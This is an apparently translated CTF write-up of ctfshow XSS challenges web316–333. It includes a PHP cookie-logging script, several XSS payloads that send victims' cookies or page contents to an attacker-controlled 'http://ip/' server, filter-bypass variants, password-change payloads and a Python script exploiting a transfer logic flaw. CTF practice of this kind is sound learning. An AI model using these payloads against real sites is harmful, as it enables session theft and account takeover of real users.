It may be a bit long-winded to write, record the process of doing the questions yourself
Article directory
web316
The background will visit our link every once in a while (usually 15 seconds) (after all, you need 10 egg bots to keep your sharing status), when the bot accesses our xss, we can get the admin's cookie .
There are two ways to get it, one is the online xss platform, such as https://xsshs.cn/ , https://xss.pt/ , http://xsscom.com to generate xss links
The other is to build it on your own website and write a piece of php code, such as
# xss.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>
Generally speaking, the first method is enough for us, but sometimes we can only use the second method. For example, in the final assessment question of ctfshow, because the second machine cannot go out of the network and cannot be proxy, and the second machine has XSS, in this case, only the second method can be used to obtain the cookie.
Here https://xss.pt/xss.php is used , first register and log in to the home page, then click Create
select default module
Get many kinds of links, use any one to generate "Blessings", refresh the title after generation, and then return to the project interface
Of course, a very common situation is: you are not admin no flag
Don't panic, this situation is normal (that is, X has reached yourself), just do it a few more times
It's so sad, I've been plugging myself in more than a dozen times
Mad, I'm speechless, I put my server on it, put it on (the php code above) and write this statement
<script>document.location.href="http://ip/xss.php?cookie="+document.cookie</script>
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Why it was successful once, I don't understand. .
web317
The payload of the previous question can't get through, because it is filtered but I don't know what to filter. It is successful to replace the script with body, which means that the script is filtered.
<body οnlοad="window.location.href='http://ip/xss.php?cookie='+document.cookie"></body>
web318
The payload of the previous question was successful
web319
The payload of the previous question was successful
web320
The payload of the previous question failed, I don't know what was filtered. Test it here.
The first test is to delete the front of the href
This means that the filter point is in the front, and the body is no problem
The second time I delete the front of the window, there is also an echo, indicating that the filter point is in front
No problem with onload, no problem with body, indicating that the problem lies in this space
Bypass method:
TAB
/
/**/
<body/**/οnlοad="window.location.href='http://ip/xss.php?cookie='+document.cookie"></body>
web321
The payload of the previous question was successful
web322
Mad is so disgusting, here you need to change the xss.php on the server to another name, in short, the three characters of xss cannot appear
<body/**/οnlοad="window.location.href='http://ip/a.php?cookie='+document.cookie"></body>
web323
The payload of the previous question was successful
web324
The payload of the previous question was successful
web325
The payload of the previous question was successful
web326
The payload of the previous question was successful
web327
Changed the subject, stored XSS
The recipient must be admin
Then try the content of the letter with 322payload
success
web328
A login, account admin, try the payload above the password
Failed, try both account and password with payload
still failed
Hey, there is a registration button on it, try it.
Unable to register admin, just change another name. Log in to user management, only admin can see it
Because only the administrator can see the user management, there is an idea here to say whether the payload can be injected into the user management, and the administrator can access it.
Register an account, the password is the above payload try
The result of practice is not
Try it with <script> here, it should be noted that a semicolon should be added at the end
<script>window.location.href='http://ip/a.php?cookie='+document.cookie;</script>
I got the administrator's cookie here, then log in directly with the cookie and try it
However, the management interface cannot be seen here, and this is temporary, so directly change the storage
Then refresh the interface and see the flag, but the flag flashes by, and there is only packet capture here
web329
The method is the same as above, can get the cookie but still can't access the page
The reason is that the administrator logs out after visiting the page, which is equivalent to the latest cookie obtained by the administrator last time.
No way here. Here, I saw that wp uses js
In this way, watch the video https://www.bilibili.com/video/BV1gi4y1A76p
<script>$('.laytable-cell-1-0-1').each(function(index,value){
if(value.innerHTML.indexOf('ctf'+'show')>-1){
window.location.href='http://ip/a.php?cookie='+value.innerHTML;
}
});</script>
The reason is that if you write ctfshow directly, the first item containing ctfshow will be our own.
…
Add a {, ctf+show{
Remember to open a new range every time the data is contaminated
web330
There is an option to change the password, so don't let the admin change his password directly
<script>window.location.href='http://127.0.0.1/api/change.php?p=admin';</script>
Just register a payload account
web331
The idea is the same as the previous one, but the method is changed from get to post
<script>$.ajax({url:'api/change.php',type:'post',data:{p:'2333'}});</script>
web332
9999 yuan to buy flag, new registered account has 5 yuan.
Then I found that the negative money can be added by myself, if not, it will be reduced, hahahaha
Just transfer -9999 to admin
web333
I wanted to write a script for the last question, but I found a simple method so I didn't write it
Write a script here and register to give me money crazy
After writing for more than 20 minutes, I have been debugging and found that I can't log in. . . I don't know why woo woo
After reading Master Yu's script, I can add money by transferring money to myself. I'm too stupid.
import requests
x=5
url="http://e8e0aa13-bff2-4b78-a8cb-f7c0f0e73ae2.challenge.ctf.show/api/amount.php"
url2="http://e8e0aa13-bff2-4b78-a8cb-f7c0f0e73ae2.challenge.ctf.show/api/getFlag.php"
headers={
'Cookie':'PHPSESSID=jkvcavn3fpfel2opl4afqdcepp'} #自己登录后的sessionid
while True:
print(x)
t=x-1
data={
'u':'mumuzi', #注册的用户名
'a':str(t)
}
r=requests.post(url,headers=headers,data=data)
print(r.text)
if(x>10000):
r2=requests.get(url2,headers=headers)
print(r2.text)
break
x+=t
At this point, the XSS part is over